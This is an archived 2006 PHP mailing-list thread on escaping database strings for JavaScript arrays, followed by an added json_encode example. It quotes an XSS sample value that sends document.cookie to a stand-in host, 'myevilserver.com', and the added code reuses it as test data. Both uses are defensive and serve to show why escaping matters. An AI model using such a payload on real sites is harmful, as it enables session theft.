[nycphp-talk] Passing JavaScript arrays

Peter Sawczynec ps at pswebcode.com
Mon Jul 10 14:57:37 EDT 2006


No, I did not pass these as actual GET or POST data between web pages. This
technique was a jury-rig technique to get strings of HTML and other odd
characters safely into a client-side JavaScript array as follows: 

The data for the JavaScript slideshow array gets pulled from MySQL by PHP,
then with PHP the urlencode($db_data) step ensures that no character element
in the $db_data string (such as single-quote, double-quote, semi-colon or
backslash) gets interpreted by the JavaScript as a command that might throw
an error on the browser page.

Then in the actual JavaScript I found that the combined JavaScript
replace(unescape(<? echo $db_data ?>),'+',' ') nicely undoes the PHP
urlencoding and ensures that when JavaScript pushes a data array string into
the browser innerHTML element the string has a very high chance of being
cross-browser compatible and the display to the user is pretty.

If this was not your technology issue, then forgive me for sending up this
suggestion.

Peter


-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On
Behalf Of Cliff Hirsch
Sent: Monday, July 10, 2006 8:19 AM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Interesting approach. How big was the array? It seems like this method might
produce unreasonably long URLs if there is extensive data.

-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Peter Sawczynec
Sent: Saturday, July 08, 2006 8:25 AM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Another possible basic technique for the PHP to JavaScript string data
transfer. 

Once upon creating a JavaScripted slideshow that rewrote the innerHTML in
div tags to change images and their complex multi-line descriptions, I found
this ditty worked for dynamically creating the JavaScript array of
image/text/HTML data.

1) In PHP do: urlencode($str_with_HTML_and_special_chars)

2) In the JavaScript do:
replace(unescape($str_with_HTML_and_special_chars),'+',' ')

Has not choked on anything.


Warmest regards,
 
Peter Sawczynec,
Technology Director
PSWebcode
_Design & Interface
_Ecommerce
_Database Management
ps at pswebcode.com
718.796.1951
www.pswebcode.com



-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org]
On Behalf Of Cliff Hirsch
Sent: Friday, July 07, 2006 1:47 PM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Thanks to all for the great responses -- very helpful. I've summarized
below:

> For security, do I just escape the output like any other variable
> destined for the browser?

It depends where it's coming from and what you're using it for. For example,
I have dynamic JS arrays coming from the DB that may contain HTML, and will
eventually populate drop-down menus.  For these, I pass through a 'js
cleansing' routine to trim, remove HTML tags, convert to UTF-8 (or
whatever), remove any line-breaks and escape all quotes. But I'd be
extremely wary if your JS data is coming from GET or POST.  I can see a
variable like the following jacking a JS array:

'); location='http://myevilserver.com/steal?your_cookies='+document.cookie;
//

If you're echoing a string from php into a javascript string var, you need
to escape it. Here's an example. The escapeString function here is slightly
modified from the one used in CakePHP's javascript helper:

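<?php
function escapeString($string) {
   // Order matters: str_replace() applies the pairs in sequence, so the
   // backslash is escaped first; otherwise input ending in "\" would
   // cancel the escaping of the quote that follows it.
   $escape = array('\\' => '\\\\', "\r\n" => '\n', "\r" => '\n', "\n" => '\n',
                   '"' => '\"', "'" => "\\'",
                   '</' => '<\/');  // keeps "</script>" in data from closing the block
   return str_replace(array_keys($escape), array_values($escape), $string);
}

$string = "It's good to \"escape\" strings";
?>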

<script language="javascript" type="text/javascript">
// <![CDATA[
   var string = '<?php echo escapeString($string); ?>';
   alert(string);
// ]]>
</script>

If you don't want the JS to be inline, you can create a separate PHP file
that only outputs JavaScript code:

<script type="text/javascript" src="js.php"></script>

Just make sure js.php has the following before you start outputting
JavaScript:

header('content-type:text/javascript');

(From what I understand, Apache will by default cache .js files but force a
request for .php templates.  This may affect the chi of your app..  man..)

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php
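
An added example, not code from anyone in this thread: the slideshow array discussed above, emitted with PHP's json_encode() instead of the urlencode()/unescape() round trip or a hand-written str_replace() table. The helper name js_literal, the sample rows and the 'caption' element id are assumptions made for illustration; it needs PHP 7.3 or later.

```php
<?php
// Hypothetical helper: encode any PHP value as a JavaScript literal that is
// safe to print inside an inline <script> block.
function js_literal($value): string
{
    // JSON is valid JavaScript literal syntax. The HEX flags emit <, >, &, '
    // and " inside strings as \uXXXX escapes, so data cannot end the string
    // early or close the <script> element. Backslashes and line breaks are
    // escaped by json_encode() itself.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed rows standing in for the MySQL result set.
$slides = [
    ['img' => 'a.jpg', 'caption' => "It's good to \"escape\" strings"],
    ['img' => 'b.jpg', 'caption' => "two\r\nlines, trailing backslash \\"],
    ['img' => 'c.jpg', 'caption' => '</script><b>markup</b> & more'],
    // The hostile value quoted earlier in the thread:
    ['img' => 'd.jpg', 'caption' => "'); location='http://myevilserver.com/steal?your_cookies='+document.cookie; //"],
];

$literal = js_literal($slides);

// Self-check: none of the characters that matter in a <script> context
// survive unescaped, and the data round-trips unchanged.
if (strpbrk($literal, "<>&'") !== false || json_decode($literal, true) !== $slides) {
    throw new RuntimeException('encoding check failed');
}

echo "<script>\n";
echo "var slides = {$literal};\n";
// Escaping for the JavaScript string says nothing about the HTML context:
// textContent displays the caption as text, innerHTML would parse it as markup.
echo "document.getElementById('caption').textContent = slides[0].caption;\n";
echo "</script>\n";
```

The encoded literal is only safe inside a script block; a value written into an HTML attribute or element body still needs htmlspecialchars() for that context.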
